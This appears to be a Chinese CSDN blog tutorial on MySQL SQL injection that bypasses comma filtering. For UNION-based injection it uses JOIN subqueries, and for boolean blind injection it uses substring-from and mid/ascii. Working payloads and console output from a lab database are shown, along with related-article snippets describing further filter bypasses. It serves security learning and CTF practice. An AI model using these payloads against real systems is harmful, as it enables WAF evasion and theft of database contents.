mysql注入过滤逗号_SQL注入--显注和盲注中过滤逗号绕过

最新推荐文章于 2023-12-27 09:44:09 发布
最新推荐文章于 2023-12-27 09:44:09 发布
阅读量643 收藏
点赞数
文章标签: mysql注入过滤逗号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32463071/article/details/113516618
版权

SQL注入逗号绕过

1.联合查询显注绕过逗号

在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。

绕过

在显示位上替换为常见的注入变量或其它语句

union select 1,2,3;

union select * from ((select 1)A join (select 2)B join (select 3)C);

union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);

在数据库中演示联合查询

UNION开始是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截

mysql> select user_id,user,password from users union select 1,2,3;

+---------+-------+----------------------------------+

| user_id | user | password |

+---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

| 1 | 2 | 3 |

+---------+-------+----------------------------------+

2 rows in set (0.04 sec)

不出现逗号,使用Join来注入

mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);

+---------+-------+----------------------------------+

| user_id | user | password |

+---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

| 1 | 2 | 3 |

+---------+-------+----------------------------------+

2 rows in set (0.05 sec)

查询我们想要的数据

mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);;

+---------+-------+-------------------------------------------------+

| user_id | user | password |

+---------+-------+-------------------------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

| 1 | 2 | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |

+---------+-------+-------------------------------------------------+

2 rows in set (0.08 sec)

2.盲注中逗号绕过

MID 和substr 函数用于从文本字段中提取字符

mysql> select mid(user(),1,2);

+-----------------+

| mid(user(),1,2) |

+-----------------+

| ro |

+-----------------+

1 row in set (0.04 sec)

查询数据库用户名第一个字符的ascii码

mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;

+---------+-------+----------------------------------+

| user_id | user | password |

+---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

| 114 | 2 | 3 |

+---------+-------+----------------------------------+

2 rows in set (0.05 sec)

盲注,通过猜ascii值

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ;

Empty set

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ;

+---------+-------+----------------------------------+

| user_id | user | password |

+---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

+---------+-------+----------------------------------+

1 row in set (0.04 sec)

逗号绕过SUBTTRING 函数

substring(str FROM pos)

从字符串str的起始位置pos 返回一个子串

mysql> select substring('hello' from 1);

+---------------------------+

| substring('hello' from 1) |

+---------------------------+

| hello |

+---------------------------+

1 row in set (0.04 sec)

mysql> select substring('hello' from 2);

+---------------------------+

| substring('hello' from 2) |

+---------------------------+

| ello |

+---------------------------+

1 row in set (0.03 sec)

注入

mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;

Empty set

//substring(user() from 2)为o

//o的ascii为111,

mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;

+---------+-------+----------------------------------+

| user_id | user | password |

+---------+-------+----------------------------------+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |

+---------+-------+----------------------------------+

1 row in set (0.03 sec)

SQL注入之Boolean型盲注

什么是Boolean型注入 Boolean型的注入意思就是页面返回的结果是Boolean型的,通过构造SQL判断语句,查看页面的返回结果是否报错,页面返回是否正常等来判断哪些SQL判断条件时成立的,通 ...

SQL注入汇总(手注,盲注,报错注入,宽字节,二次编码,http头部){10.22、23 第二十四 二十五天}

首先什么是SQL注入: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. SQL注入有什么危害? 危害:数据泄露.脱库 ...

sql注入--bool盲注,时间盲注

盲注定义: 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注. 布尔盲注: 布尔盲注只有true跟false,也就是说它根据你的注入信息 ...

大哥带我们的mysql注入 基于时间的盲注

?id= and ,,sleep()) ?id= and ,,sleep()) if语句/if()函数 在基于时间型SQL盲注中,我们经常使用条件语句来判断我们的操作是否正确: ?id= and = ...

大哥带我们的mysql注入 基于bool的盲注

盲注 那么我们来了解一点盲注的语法 这里面是语法的介绍 https://blog.csdn.net/alex_seo/article/details/82148955 0X01第一步我们先判断当前数据 ...

[靶场实战]:SQL注入-显错注入

SQL注入的本质:就是将用户输入的数据当作代码带入执行. 注入条件: 1.用户能控制输入 2.能够将程序原本执行的代码,拼接上用户输入的数据进行执行 首先检查是否存在注入点 Rank1: 构造语句 ? ...

sql注入 --显错注入

前提知识 数据库:就是将大量数据把保存起来,通过计算机加工而成的可以高效访问数据库的数据集合数据库结构:库:就是一堆表组成的数据集合表:类似 Excel,由行和列组成的二维表字段:表中的列称为字段记录 ...

MySQL手注之盲注(布尔)

布尔注入: 当我们在注入的过程中输入的语句在页面没有数据返回点,这就需要利用布尔型盲注一步步来猜取想要的数据.(盲注分为布尔盲注和时间盲注) 盲注常用函数: length()  返回字符串的长度, 可 ...

如何使用PDO查询Mysql来避免SQL注入风险?ThinkPHP 3.1中的SQL注入漏洞分析!

当我们使用传统的 mysql_connect .mysql_query方法来连接查询数据库时,如果过滤不严,就有SQL注入风险,导致网站被攻击,失去控制.虽然可以用mysql_real_escape_ ...

随机推荐

设为首页 添加到收藏夹 (share)

设为首页,添加到收藏夹 分享自:http://my.oschina.net/lyx2012/blog/60036 设为首页 和 收藏本站js代码 兼容IE,chrome,ff

利用3.0里面封装好的模板类来写,不罗嗦,直接上例子(消除星星小游戏中 星星类) require "extern" StarSprite = class("StarSpr ...

XML和DTD的简单介绍和入门

XML(Extensible Markup Lanaguage),可扩展标记语言,是标准通用标记语言(Standard Generalized Markup Language, SGML)的一个子集, ...

解决Android Activity切换时出现白屏问题

有些性能低的机器,在切换activity时候出现白屏一段时候后才显示正确的视图 高性能的机器可能太快看不到,但是事实是存在的, 特别是当你新开一个进程的时候,A进程的activity跳转到B进程的Ac ...

springMVC框架+POI组件导出Excel

目的:访问url(http://localhost:8080/POIOutputExcel/outputexcel.do)实现excel导出,效果图如下: 文件目录(配置文件就不多说了,跟前面的随笔一 ...

Django+Bootstrap+Mysql 搭建个人博客(二)

2.1.博客首页设计 (1)settings.py MEDIA_ROOT = os.path.join(BASE_DIR,'media').replace("//","/ ...

微信小程序做radio,可以拖动进度条

很简单的一个音乐播放器 data:{ src: 'http://ws.stream.qqmusic.qq.com/M500001VfvsJ21xFqb.mp3?guid=ffffffff82def4a ...

CustomScrollView

body: CustomScrollView( slivers: [ SliverList( delegate: SliverChildBuilderDelegate( (context, int i ...

splice的用法

splice向数组中删除/添加新元素,然后返回新数组 arrObject.splice(index,howmany,item1,...,itemx); 参数 描述 index 必需.整数,规定添加/删 ...

1Mybatis入门--1.1单独使用jdbc编程问题总结

1.1.1 jdbc程序 Public static void main(String[] args) { Connection connection = null; PreparedStatemen ...

雀蜂
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于SQL注入绕过逗号过滤
weixin_43247256的博客
01-27 6843
CTF sql注入题目。
mysql注入过滤逗号,SQL注入简单总结——过滤逗号注入
weixin_33806343的博客
03-18 888
最近做了一些CTF题目,发现sql题目很喜欢出过滤","的题目,借此机会特此总结。并且我有一个想法能够通过编写tamper尽量多的解决sql注入的题目。在使用的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:select substr(database() from 1 for...
SQL注入简单总结——过滤逗号注入.pdf
04-08
SQL注入简单总结——过滤逗号注入
SQL注入一些过滤绕过总结
最新发布
2301_76786857的博客
12-27 693
过滤关键字应该是最常见的过滤了,因为只要把关键字一过滤,你的注入语句基本就不起作用了。(3)既然是过滤关键字,大小写应该都会被匹配过滤,所以大小写绕过一般是行不通的。常见的几种注入方法基本上都要使用逗号,要是逗号过滤了,那就只能想办法绕过了。(2)对于的那几个函数substr(),mid(),limit。(1)最常用的绕过方法就是用/**/,,分割关键字。(2)根据过滤程度,有时候还可以用双写绕过。(1)简单注入可以使用join方法绕过。(4)有时候还可以使用编码绕过
sql注入(三)绕过方法及防御手段
m0_63306943的博客
05-02 7518
1)如果 waf 过滤逗号,并且只能,在取子串的几个函数,有一个替代逗号的方法就是使用 from for ,其 pos 代表从 pos 个开始读取 len 长度的子串。rlike 模糊匹配,只要字段的值存在要查找的 部分 就会被选择出来,用来取代 = 时,rlike 的用法和上面的 like 一样,没有通配符效果和 = 一样。因为这些sql命令的执行, 必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的,
MySQL将一个字段逗号分隔的取出来形成新的字段实现
12-14
1例如:要把如图1的字段拆分图2 select account_id, substring_index(substring_... mysql.help_topic b on b.help_topic_id < (length(a.related_shop_ids) - length(replace(a.related_shop_ids,',',''))+1
MySQL查询指定字段不是数字与逗号的sql
09-08
今天小编遇到一个问题因为编辑的不细心不小心将关键词写到相关文章里面导致页面无法生成,这里用sql语言将这些内容获取出来
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
本实验使用SQL注入绕过认证,其包含释符绕过、大小写绕过、特殊编码绕过、内联绕过等方式。 三、实验环境 1、Windows 10 2、MySQL 四、实验步骤 SQL注入绕过 1.1释符绕过 常用释符:-- , /**/, # 验证:...
MySQL将一列以逗号分隔的值行转列的实现
12-14
即一列存储了多个属性值。如下表 pk value 1 ET,AT 2 AT,BT 3 AT,DT 4 DT,CT,AT 一般有这两种常见需求(测试数据见文末) 1.得到所有的不重复的值,如 value AT BT CT DT ET SQL...
MySQL字段使用逗号分隔符的方法分享
12-15
被分割的字段一定是有限而且数量较少的,我们不可能在一个字符串存储无限多个字符 这个字段所属的表与这个字段关联的表,一定是一对多的关系 比如下面这个表结构所代表的content与tag这两个对象 代码如下: mysql> ...
SQL注入技巧之过滤逗号绕过详析
09-09
SQL注入绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之过滤逗号绕过的相关资料,文通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
mysql 去掉多余的逗号,如何删除mysql查询的空逗号
weixin_35519827的博客
01-19 835
actual data (,,,demo, ,xxxx,,,yyy,,,) to be (demo,xxxx,yyy)What I have tried:i had triedSELECT TRIM(BOTH ',' FROM ',,,demo, ,xxxx,,,yyy,,,');SELECT REPLACE(TRIM(TRIM(',' FROM ',,,demo, ,xxxx,,,yyy,,,'...
mysql注入过滤逗号_[SQL注入] 逗号拦截绕过
weixin_39906245的博客
02-02 890
在SQL注入时,在确定了注入点后,一般都需要使用联合查询猜表的列数,也就是常见的order by n,n从大到小,直到返回正常,就确定了当前查询的列的个数。然后再使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆示位,然后再 UNION SELECT 1,2,3,4,database(),6,7..n ,这是一个常规流程,语句包含了多个逗号。但是如果有WAF拦截了逗...
SQL篇之SQL注入绕过姿势总结
zkaqlaoniao的博客
10-25 1486
目录 1.释符绕过 2.大小写绕过 3.内联绕过 4.双写关键字绕过 5.特殊编码绕过 6.空格过滤绕过 7.过滤or and xor(异或)not 绕过 8.过滤等号=绕过 9.过滤大小于号绕过 10过滤引号绕过 11.过滤逗号绕过 12.过滤函数绕过 13.缓冲区溢出 1.释符绕过 常用的释符有: 1)--释内容 2)#释内容 3)/*释内容*/ eg:union select 1,2# union select 1,2 --+ 构造闭...
mysql 查询某字段逗号分隔的字符串的包含查询和关联查询实现
零度的博客专栏
07-25 4610
实现mysql查询某字段逗号分隔的字符串包含查询和关联查询
mysql注入过滤逗号_SQL注入绕过的技巧总结
weixin_42488542的博客
02-02 1787
前言sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。稍微有点安全意识的朋友就应该懂得要做一下sql注入过滤。SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程遇到的环境,否则如果仅仅是自己凭空想,那然是不靠谱的。这篇文章...
sql注入常见绕过
weixin_55802150的博客
08-03 206
两个空格tab绕过/**/ 释符绕过()把需要计算的地方用()包起来 可以绕过空格。
SQL注入原理及思路(绕过)-超详细
weixin_52501704的博客
05-17 2825
(1)user() 返回当前使用数据库的用户,也就是网站配置文件连接数据库的账号 (2)version() 返回当前数据库的版本 (3)database() 返回当前使用的数据库,只有在use命令选择一个数据库之后,才能查到 (4)group_concat() 把数据库的某列数据或某几列数据合并为一个字符串 (5)@@datadir 数据库路径 (6)@@version_compile_os 操作系统版本。通过+1、-1、and 1=1、and 1=2、释符。或者通过报错注入是网页返回报错信息。
sql注入绕过技巧
m_ing
10-21 1765
前言 今天斗胆来整理一下sql注入的各种绕过姿势,以后方便查阅。SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程遇到的环境,否则如果仅仅是自己凭空想,那然是不靠谱的。 1.括号绕过空格 如果空格被过滤,括号没有被过滤,可以用括号绕过。 在MySQL,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。 例如: select(user())from dual where
mysql出现 quot gt_[Err] 1064 - You have an error in your SQL syntax; check the manual that corresponds...
06-09
这个错误通常是因为你的SQL语句存在语法错误导致的。你需要仔细检查你的SQL语句,确保它们符合MySQL语法规则。以下是一些可能导致这个错误的常见原因: 1. 语法错误:比如漏掉了逗号、引号或者括号等符号。 2. 数据类型不匹配:比如你尝试将一个字符串插入到一个整数类型的列。 3. 错误的表名或列名:比如你引用了一个不存在的表或列。 4. SQL注入攻击:比如你的SQL语句包含了恶意的代码,攻击者试图通过这种方式来获取你的敏感数据。 如果你无法找到错误,可以将你的SQL语句复制到一个文本编辑器,并对其进行排版和格式化,这通常可以帮助你更容易地发现语法错误。同时,你也可以在搜索引擎上搜索这个错误信息,找到更多的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值